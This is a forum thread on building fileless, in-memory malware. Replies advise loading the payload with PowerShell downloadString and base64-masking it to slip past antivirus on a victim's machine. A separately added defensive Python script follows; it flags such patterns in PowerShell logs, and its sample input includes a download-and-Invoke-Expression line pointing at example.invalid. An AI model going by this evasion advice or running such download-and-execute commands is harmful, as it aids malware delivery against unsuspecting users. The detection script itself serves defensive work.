Thread: Memory based viruses in non-interpreted languages?


  1. #1
    Junior Member
    Join Date Jul 2018
    Posts 6

    Memory based viruses in non-interpreted languages?

    I'm not sure if this is more of a question or more of an attempt to start a discussion. Well, probably both. However, since these viruses are getting increasingly popular, I've thought about opening a thread about it.

    In short, a memory-based virus is a virus that relies on execution from memory instead of files. The advantages are extremely huge - anti-viruses that don't scan memory or evaluate damage caused by the virus stand no chance against it, leaving only a few anti-viruses as viable opponents.

    In interpreted languages it is fairly easy. Simply call it through eval. However, using it with interpreted languages is kind of meh, because they don't have as much power as low-level languages (although they still can do some nasty damage).
    The only issue with using low-level languages is that it's not the easiest to create a dynamic compiler.

    So I wonder, if you were to make a memory-based compiler, how would you, if you would, go for it? I don't mean a step-by-step guide, since that is rather impossible. My current favorite is using nw.js, because I can combine JavaScript with C++, but many AVs label nw.js as a virus, so it's not the most viable choice.
  2. #2
    Pernat1y
    Senior Member
    Join Date Dec 2007
    Location Internets
    Posts 1,999
    In most cases the "fileless" part (e.g. your js/powershell/vbs script) just downloads and executes (preferably in memory, otherwise it will be pointless) the main part of your application, which can be in any common language.
    PMs about malware = instant trip to ignore list.
  3. #3
    sagitari0
    Junior Member
    Join Date Dec 2017
    Posts 11
    In most cases the "fileless" part (e.g. your js/powershell/vbs script) just downloads and executes (preferably in memory, otherwise it will be pointless) the main part of your application, which can be in any common language.
    Using PowerShell, for example, you can use the 'downloadString' method. That downloads the file directly to memory.
    But remember, AVs don't scan the memory but scan what your machine is downloading... to bypass this, you have to download the malware masked... I like base64 very much: you convert the malware bytes to base64, drop it to the victim, and decode.
    Sorry for my English, it's not my native language.

    padwan in malware, padwan in hacking, jedi to find bugs in my life.

    WickrMe : sagitari0
    Jabber: sagitari0@exploit.im
  4. #4
    Junior Member
    Join Date Jul 2018
    Posts 6
    @sagitari0 Actually, the top-tier AV companies have already realized the threats of memory-based viruses and they will scan your memory. ESET even publicly declares it as a feature. However, a memory scan is quite difficult to make and quite easy to bypass, since it's a level 1 process.
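
Seen from the defending side, the pattern described in reply #3 (a script pulls a string into memory, often base64-encoded, then decodes or runs it) leaves text that PowerShell script block logging (Event ID 4104) records. The following is an added example, not part of any post in this thread: a Python triage over constructed script block text, where the indicator list, the function names and the sample lines are assumptions made for illustration.

```python
import base64
import re

# Heuristic indicators chosen for this example (assumption, not a complete rule set).
DOWNLOAD = re.compile(r"\.download(string|data)\s*\(", re.I)
B64_DECODE = re.compile(r"frombase64string\s*\(", re.I)
DYN_EXEC = re.compile(r"\b(iex|invoke-expression)\b", re.I)
B64_RUN = re.compile(r"[A-Za-z0-9+/]{40,}")  # long literal that may hide a payload


def has_embedded_pe(text):
    """True if a long base64 literal decodes to bytes starting with the PE magic 'MZ'."""
    for match in B64_RUN.finditer(text):
        head = base64.b64decode(match.group(0)[:4])  # first 4 chars -> first 3 bytes
        if head.startswith(b"MZ"):
            return True
    return False


def classify(script_block):
    """Return the set of indicator names found in one logged script block."""
    findings = set()
    if DOWNLOAD.search(script_block):
        findings.add("download-to-memory")
    if B64_DECODE.search(script_block):
        findings.add("base64-decode")
    if DYN_EXEC.search(script_block):
        findings.add("dynamic-exec")
    if has_embedded_pe(script_block):
        findings.add("embedded-pe")
    return findings


def is_suspicious(findings):
    """Alert on combinations, since each indicator alone is common in admin scripts."""
    return ({"download-to-memory", "dynamic-exec"} <= findings
            or {"base64-decode", "embedded-pe"} <= findings)


# Constructed sample input: the fake "PE" is only the magic followed by zero bytes.
FAKE_PE_B64 = base64.b64encode(b"MZ" + bytes(40)).decode()
SAMPLES = [
    "$s = (New-Object Net.WebClient).DownloadString('http://example.invalid/a.txt'); Invoke-Expression $s",
    "$b = [Convert]::FromBase64String('" + FAKE_PE_B64 + "')",
    "Get-ChildItem C:\\Users | Sort-Object Length",
]

if __name__ == "__main__":
    for block in SAMPLES:
        found = classify(block)
        print(is_suspicious(found), sorted(found), block[:60])
```

Text matching of this kind only sees what the logging layer records, so it complements rather than replaces the memory scanning discussed in reply #4.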